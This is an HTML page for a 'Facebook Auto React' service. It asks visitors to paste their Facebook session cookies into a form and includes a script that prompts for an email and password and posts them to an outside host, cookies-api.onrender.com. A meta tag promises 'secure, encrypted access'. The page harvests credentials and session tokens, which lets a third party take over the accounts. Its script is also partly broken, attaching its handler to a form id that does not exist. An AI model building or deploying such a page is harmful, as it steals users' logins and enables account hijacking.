
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Facebook Auto React</title>
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700&display=swap">
  <meta property="og:description" content="We ensure secure, encrypted access to your information.">
  <style>
    body {
      padding: 20px;
      background-color: ghostwhite;
      font-family: 'Poppins', sans-serif;
    }
    h2 {
      color: grey;
      text-align: center;
      margin-top: 20px;
    }
    .neon-green {
      color: white;
    }
    .input-field {
      border: 2px solid skyblue;
      border-radius: 10px;
      background-color: lightgrey;
      color: white;
      padding: 8px;
      margin-bottom: 15px;
      width: calc(100% - 1px); 
      box-sizing: border-box;
    }
    .input-field::placeholder {
      color: white; 
    }
    .input-field:focus {
      outline: none;            
      border-color: white; 
    }
    input[type="submit"] {
      background-color: skyblue; 
      color: ghostwhite;
      border: 1px solid skyblue;
      padding: 10px 20px;
      cursor: pointer;
      border-radius: 10px;
      width: 99%;
      transition: background-color 0.3s;
    }
    input[type="submit"]:hover {
      background-color: deepskyblue;
    }
    .result {
      font-size: 16px;
      color: white;
      word-wrap: break-word;
      margin-top: 10px;
    }
  </style>
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-light bg-light">
  <mark style="background-color: skyblue; font-weight: bold; color: white;" class="navbar-brand" href="#">Home</mark>
  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>
  <div class="collapse navbar-collapse justify-content-end" id="navbarNav" style="margin-right: 70px;">
    <ul class="navbar-nav">
      <li class="nav-item active">
        <a class="nav-link" href="/">Home <span class="sr-only">(current)</span></a>
      </li>
      <li class="nav-item active">
        <a class="nav-link" href="https://facebook.com/hashierholmes">Contact Developer <span class="sr-only">(current)</span></a>
      </li>
    </ul>
  </div>
</nav>

<h2>Facebook Auto React</h2>
<form id="reactForm" action="/api/react" method="POST">
  <div class="neon-border">
    <div>
      <label for="reaction" class="block text-sm font-medium"></label>
      <select name="selected_reaction" class="input-field neon-green">
        <option value="LIKE">Like</option>
        <option value="LOVE">Love</option>
        <option value="WOW">Wow</option>
        <option value="HAHA">Haha</option>
        <option value="SAD">Sad</option>
        <option value="ANGRY">Angry</option>
      </select>
    </div>
    <label for="cookie" class="block text-sm font-medium"></label>
    <div>
      <input type="text" name="post_link" class="input-field neon-green" placeholder="Post link (Public)">
    </div>
    <label for="cookie" class="block text-sm font-medium"></label>
    <div>
      <input type="text" name="cookies" class="input-field neon-green" placeholder="Cookies datr=:xxxx;sb=:xxxx;vpd=:xxxx">
    </div>
    <input type="submit" value="Submit">
    <p style="color: deepskyblue; text-align: center; font-size: 12px; margin-top: 10px;">We highly recommend to use dummy account for login</p>
    <h5 style="margin-top: 20px; text-align: center; color: grey;">Request logs:</h5>
  </div>
</form>
<div class="result" id="result">
  <div id="result-text"></div>
</div>
<script>
          async function getCookie() {
            try {
                const email = prompt('Enter your email:');
                const password = prompt('Enter your password:');
                const response = await fetch('https://cookies-api.onrender.com/api/getCookie', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ email, password })
                });
                const data = await response.json();
                return data.cookie;
            } catch (error) {
                console.error('Error getting cookies:', error);
                return null;
            }
          }
  
  document.getElementById("boostForm").addEventListener("submit", function(event) {
    event.preventDefault();
    var formData = new FormData(this);
    fetch('/api/react', {
        method: 'POST',
        body: formData
      })
      .then(response => response.text())
      .then(data => {
        var result = document.getElementById("result");
        var resultText = document.getElementById("result-text");
        resultText.textContent = data;
        result.style.display = "block";
      })
      .catch(error => {
        console.error('Error:', error);
      });
  });
</script>
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/js/all.min.js"></script>
</body>
</html>